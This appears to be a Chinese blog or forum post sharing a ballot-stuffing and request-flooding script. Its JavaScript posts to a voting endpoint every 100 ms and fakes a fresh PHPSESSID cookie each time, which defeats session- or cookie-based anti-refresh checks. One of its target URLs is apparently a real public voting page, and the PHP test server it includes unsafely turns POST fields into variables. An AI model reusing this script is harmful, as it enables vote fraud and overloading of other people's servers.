如果是基于session或者cookie做防止刷新，那么，我可以偽造狀態，用xmlhttp把服務器刷爆 代碼如下，服務器端的代碼在最后一個 ``` <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> xmlhttp</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script language="javascript" type="text/javascript" src="fckXML.js"></script> <script language="javascript" type="text/javascript"> <!-- function SetCookie(sName, sValue) { date = new Date(); document.cookie = sName + "=" + escape(sValue) + "; expires=" + date.toGMTString(); } if ( window.XMLHttpRequest ) // Gecko oXmlHttp = new XMLHttpRequest() ; else if ( window.ActiveXObject ) // IE oXmlHttp = new ActiveXObject("MsXml2.XmlHttp") ; /* 看了并分析了服務器端的結果，依靠xmlhttp來偽造ip是不可能的了。 setRequestHeader 單獨指定請求的某個http頭 你的客戶機ip不在其中，如果服務器端是基于ip防止刷新的，你就別費心了唄，除非是用c寫socket自定義ip包。而且能確保頭不被網關修改。 如果服務器是asp的基于session認證的，呵呵，那怎么辦哪。用c寫socket程序？怎么偽造我不知道了。 如果服務器是php的基于session或者cookie防止刷新，呵呵，那我就ok了。 下一步計劃，搞清楚asp的session機制。反正不是依靠cookie的。我沒辦法了，除非尋找c語言的解決方案。 */ urlToCall = "http://toupiao.scol.com.cn/toupiao_save.asp"; urlToCall = "http://develop-3/test/jstest/xmlhttp/server.php"; urlToCall = "http://test.bai.com/jstest/xmlhttp/server.php"; host = "test.bai.com"; var bAsync = 1 ; result = ''; i = 1; n = 2; function zuobiStart() { //打開url oXmlHttp.open( "POST", urlToCall, bAsync ) ; //偽造ssessionid 欺騙服務器，服務器的本次會話session就重新置換了,所有的session就失去意義了。 phpsessid = Math.random(); id2 = Math.random(); phpsess = phpsessid.toString()+'11111'+id2.toString(); phpsess = phpsess.replace( //./g,"0" ); phpsess = phpsess.substr( 0,32 ); cook ="PHPSESSID="+phpsess+"; "; //設置PHPSESSID,由于php的session依靠cookie來實現，所以這樣就實現了本次會話session的刷新 document.cookie=cook; //以下是可以修改的頭 oXmlHttp.setRequestHeader ( "ADDR000", 'test' ); oXmlHttp.setRequestHeader ( "User-Agent", "Mozilla/4.0 " ); oXmlHttp.setRequestHeader( "accept-language", "zh_cn"); oXmlHttp.setRequestHeader( "CONTENT-TYPE","application/x-www-form-urlencoded"); oXmlHttp.setRequestHeader( "accept-encoding", "gzip, deflate"); oXmlHttp.setRequestHeader( "CONNECTION", "keep-alive"); oXmlHttp.setRequestHeader( "accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*"); //以下是不可以修改的頭,改了服務器也不認 oXmlHttp.setRequestHeader( "Referer", 'example.test.com'); oXmlHttp.setRequestHeader ("Cookie", cook); oXmlHttp.setRequestHeader ("HOST", host ); oXmlHttp.setRequestHeader( "content-length", "11"); oXmlHttp.setRequestHeader( "CACHE_CONTROL", "kcache"); params = 'item_button=45&topic=5'; //發送測試結果 oXmlHttp.send(params) ; //測試返回結果 oXmlHttp.onreadystatechange = function() { if ( oXmlHttp.readyState == 4 ) { result += oXmlHttp.responseText; } } // i++; //跳出循環 if (i>n){ //alert("end/n"+i.toString()+"/n"+n.toString()); infoObj = document.getElementById('info'); infoObj.value = result; //info.value = result+"慰問慰問"; clearInterval(flushtimerID); } }//end func //結束 flushtimerID = window.setInterval(zuobiStart,100); //--> </script> </head> <body> <textarea name="info" id="info" rows="10" cols="90" > ``` ```<?php require_once('echo.php'); session_start(); //pr($_COOKIE);pr($_GET);pr($_POST); //pr($_SESSION);pr($_COOKIE); if ( $_SESSION['posted'] == 1 ) { echo"error"; DIE; } //get cookie number $num = $_COOKIE['currNum']; $expires = time()+60*60*24*365; if (!isset($_COOKIE['currNum'])) { setcookie('currNum' , 1 , $expires ); echo "cookie沒有設置/n"; } else { $num++; setcookie('currNum',$num); echo $num; } ?> <style type="text/css"> *{font:12px verdana;} </style> <pre> <?php foreach ($_POST as $key=>$v) { $$key = $v; $str .=$v."/r/n"; //echo "$v /n"; } //print_R($_SERVER); foreach ($_SERVER as $k=>$v) { $str .=$k."=".$v."/n"; } echo $str; $fp = fopen("d:/tmp/".$num.".txt","wb"); //fwrite($fp,$str); fclose($fp); $_SESSION['posted'] = 1; ?> ```